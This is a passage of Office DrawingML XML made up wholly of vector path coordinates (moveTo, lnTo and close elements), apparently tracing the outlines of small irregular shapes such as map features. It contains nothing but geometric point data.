                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18563" y="4723"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18512" y="4723"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18516" y="4835"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18563" y="4967"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18626" y="4957"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18610" y="4813"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18730" y="4906"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18730" y="4774"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18801" y="4733"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18735" y="4588"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18719" y="4640"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18667" y="4607"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18610" y="4569"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18497" y="4425"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="11319" y="4774"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11282" y="4826"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11272" y="4877"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11287" y="4957"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11313" y="4989"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11329" y="4887"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11319" y="4774"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="18652" y="4989"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="18601" y="5009"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18605" y="5102"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18657" y="5256"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18667" y="5419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18652" y="5471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18601" y="5605"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18549" y="5544"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18549" y="5779"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18481" y="5759"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18377" y="5801"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18356" y="5891"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18316" y="5955"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18299" y="6045"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18257" y="6087"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18299" y="6180"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18341" y="6221"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18351" y="6343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18393" y="6395"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18419" y="6334"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18408" y="6109"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18330" y="6006"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18398" y="6006"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18450" y="5942"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18542" y="5913"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18568" y="6016"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18620" y="6067"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18667" y="5904"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18766" y="5904"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18822" y="5830"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18827" y="5737"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18801" y="5666"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18797" y="5564"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18756" y="5419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18771" y="5288"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18740" y="5172"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18652" y="4989"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="11313" y="5009"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11287" y="5050"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11256" y="5050"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11267" y="5121"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11272" y="5288"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11298" y="5326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11319" y="5275"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11345" y="5288"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11350" y="5111"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11313" y="5009"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="11675" y="5419"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11635" y="5429"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11578" y="5442"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11510" y="5429"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11505" y="5503"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11583" y="5564"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11614" y="5583"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11661" y="5634"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11671" y="5564"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11661" y="5522"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11675" y="5419"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="12153" y="5759"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="12142" y="5820"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12215" y="5840"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12215" y="5862"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12297" y="5852"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12304" y="5811"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12271" y="5830"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12271" y="5811"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12231" y="5801"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12184" y="5801"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12153" y="5759"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="12775" y="5759"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="12723" y="5801"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12681" y="5801"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12676" y="5830"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12671" y="5830"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12645" y="5840"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12660" y="5891"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12692" y="5913"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12749" y="5862"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12744" y="5852"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12738" y="5820"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12775" y="5759"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="18481" y="5942"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="18471" y="5994"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18434" y="5984"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18424" y="6067"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18434" y="6128"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18481" y="6170"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18481" y="6087"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18502" y="6058"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18533" y="6096"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18549" y="6016"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18533" y="5974"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18481" y="5942"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="6229" y="6940"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6229" y="6950"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6250" y="7011"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6240" y="7084"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6250" y="7094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6271" y="7001"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6229" y="6940"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="6182" y="6959"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6156" y="6969"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6156" y="7020"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6219" y="7001"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6224" y="6959"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6182" y="6959"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="17972" y="7174"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="17937" y="7277"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17916" y="7412"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17932" y="7514"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17972" y="7627"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17988" y="7514"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18005" y="7299"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18005" y="7216"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17972" y="7174"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="6182" y="7187"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6167" y="7277"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6182" y="7309"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6193" y="7393"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6208" y="7380"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6214" y="7309"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6203" y="7197"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6182" y="7187"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="5923" y="7463"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5908" y="7473"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5861" y="7495"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5830" y="7514"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5800" y="7547"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5783" y="7598"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5753" y="7636"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5774" y="7649"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5804" y="7636"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5814" y="7607"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5840" y="7598"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5887" y="7534"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5944" y="7534"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5923" y="7575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5939" y="7598"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6017" y="7617"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6033" y="7649"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6085" y="7688"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6120" y="7678"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6130" y="7761"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6146" y="7790"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6188" y="7803"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6208" y="7842"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6162" y="7916"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6250" y="7906"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6292" y="7916"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6328" y="7906"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6370" y="7893"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6379" y="7855"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6337" y="7803"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6297" y="7790"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6302" y="7761"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6266" y="7729"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6245" y="7729"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6214" y="7668"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6167" y="7585"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6151" y="7556"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6094" y="7566"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6073" y="7524"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6022" y="7473"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5975" y="7473"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5923" y="7463"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="1322" y="7598"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1310" y="7607"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1305" y="7617"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1326" y="7636"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1331" y="7627"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1336" y="7598"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1322" y="7598"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="1409" y="7659"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1388" y="7678"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1388" y="7688"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1394" y="7720"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1414" y="7720"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1420" y="7720"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1409" y="7668"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1409" y="7659"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="1446" y="7729"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1440" y="7752"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1472" y="7752"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1472" y="7739"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1446" y="7729"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="1477" y="7761"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1472" y="7771"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1472" y="7781"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1477" y="7790"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1482" y="7822"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1503" y="7813"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1513" y="7790"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1498" y="7771"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1477" y="7761"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="1513" y="7864"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1508" y="7874"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1508" y="7893"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1492" y="7925"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1487" y="7935"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1492" y="7986"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1487" y="8028"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1498" y="8047"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1513" y="8018"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1534" y="7996"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1560" y="7967"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1555" y="7916"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1543" y="7893"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1534" y="7883"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1518" y="7864"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1513" y="7864"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="17371" y="7883"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="17310" y="7925"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17284" y="7986"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17294" y="8098"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17345" y="8140"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17392" y="8079"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17402" y="7996"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17423" y="7935"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17402" y="7883"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17371" y="7883"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="6436" y="7906"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6422" y="7944"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6457" y="7967"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6452" y="8018"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6478" y="8079"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6452" y="8111"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6410" y="8098"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6354" y="8079"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6349" y="8121"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6379" y="8163"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6405" y="8140"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6441" y="8150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6473" y="8140"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6509" y="8163"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6509" y="8201"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6525" y="8224"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6556" y="8130"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6577" y="8111"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6582" y="8140"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6608" y="8130"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6618" y="8111"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6639" y="8121"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6664" y="8111"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6690" y="8140"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6716" y="8089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6690" y="8037"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6664" y="8028"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6669" y="7986"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6634" y="7996"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6629" y="7944"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6613" y="7944"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6577" y="7916"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6530" y="7916"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6525" y="7935"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6473" y="7916"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6436" y="7906"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="6151" y="8098"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6125" y="8111"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6115" y="8140"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6146" y="8191"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6177" y="8214"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6198" y="8182"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6240" y="8182"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6234" y="8150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6203" y="8111"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6162" y="8098"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6151" y="8098"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="6789" y="8098"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6778" y="8121"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6778" y="8172"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6815" y="8172"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6862" y="8172"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6877" y="8140"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6867" y="8111"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6836" y="8098"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6789" y="8098"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="18014" y="8098"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="18009" y="8224"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18019" y="8439"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17993" y="8387"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18005" y="8522"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18014" y="8583"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18050" y="8653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18056" y="8612"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18076" y="8644"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18061" y="8676"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18061" y="8737"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18092" y="8766"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18144" y="8747"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18191" y="8830"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18201" y="8779"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18226" y="8849"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18278" y="8910"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18283" y="8849"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18257" y="8817"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18264" y="8747"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18180" y="8663"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18154" y="8686"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18123" y="8663"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18102" y="8560"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18102" y="8448"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18134" y="8406"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18139" y="8294"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18113" y="8191"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18118" y="8140"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18108" y="8098"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18092" y="8140"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18050" y="8098"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18014" y="8098"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="18045" y="8788"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="18082" y="8891"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18113" y="8961"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18123" y="8840"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18097" y="8788"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18045" y="8788"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="18290" y="8910"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="18335" y="9013"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18335" y="9064"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18299" y="9055"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18316" y="9138"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18335" y="9148"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18341" y="9241"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18367" y="9209"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18351" y="9125"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18346" y="9074"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18393" y="9116"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18367" y="8961"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18346" y="8910"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18290" y="8910"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="18154" y="9003"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="18165" y="9064"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18165" y="9138"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18170" y="9199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18205" y="9157"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18231" y="9096"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18226" y="9045"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18191" y="9045"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18154" y="9003"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="18014" y="9074"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="17988" y="9209"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17958" y="9302"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17916" y="9382"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17890" y="9475"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17962" y="9353"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17993" y="9260"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18031" y="9176"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18014" y="9074"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="18290" y="9087"/>
                </a:moveTo>
                <a:lnTo>
